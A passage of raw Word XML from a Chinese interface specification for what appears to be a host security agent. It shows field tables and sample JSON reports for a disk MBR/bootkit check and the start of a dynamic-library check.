      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1554083656,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "file_md5": "f52296c7e3e42b2919e131f5af21e6e1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_permission</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1:3.3.9-1ubuntu2.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "f52296c7e3e42b2919e131f5af21e6e1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_owner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 106832,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "root"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A39D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc115166303"/>
      <w:bookmarkStart w:id="462" w:name="检查功能磁盘mbr检查"/>
      <w:bookmarkEnd w:id="460"/>
      <w:r>
        <w:t>检查功能：磁盘MBR检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="53395CFF"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1276"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2056"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D994D5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AB17A74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B3897B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33AE2F9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C658482" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F3FFB68" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D38BB7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>com_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247D0BFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C41CC7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334EC09C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>COM ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AFCD791" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="049CC3B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pcid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D0CEB92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B5FA55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375174DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>PC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22955B3D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E69FA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dist_ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A86C80C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB51EB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12675E32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>发行版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="569F1357" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56D9FA0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>grub_ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="035A4B65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A0B1B89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572C394D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>grub版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D187944" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FB5DEAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2C662A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155858DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7955D6A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31F045CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EF11352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msg_ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="617F2719" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660BE304" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7110F0BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>上报消息版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AC946CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69B2735B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boot_mbr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E005880" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E501CA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>300)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12686A78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>上磁盘的MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49C12547" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26ADEBB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>grub_mbr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7938524C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00BA1BC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>300)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC7958C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GRUB备份的MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E826422" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11BFFF1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>single_mbr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DAAF213" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72158403" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E766160" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否磁盘有多份MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B485866" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174180C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>com_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "a85acd72128679169a0e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1533631489,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boot_mbr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "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",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1cc64150a44d57c4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dist_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "CentOS release 6.9 (Final)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grub_mbr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"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",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grub_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0.97",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>single_mbr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msg_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.0.0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCB59C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc115166304"/>
      <w:bookmarkStart w:id="464" w:name="检查功能动态链接库检查"/>
      <w:bookmarkEnd w:id="462"/>
      <w:r>
        <w:t>检查功能：动态链接库检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w14:paraId="0D4003D5"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2343"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2635E30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BDFC25E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02306EA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171118A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EB129E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2811755B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C52929F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06CFE83C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710CECAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17E0D9D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48705BE2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40CFE7A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>before_unset_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F678A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="447EDAEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A1D4DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装前路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1671E111" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1981C405" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>after_unset_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
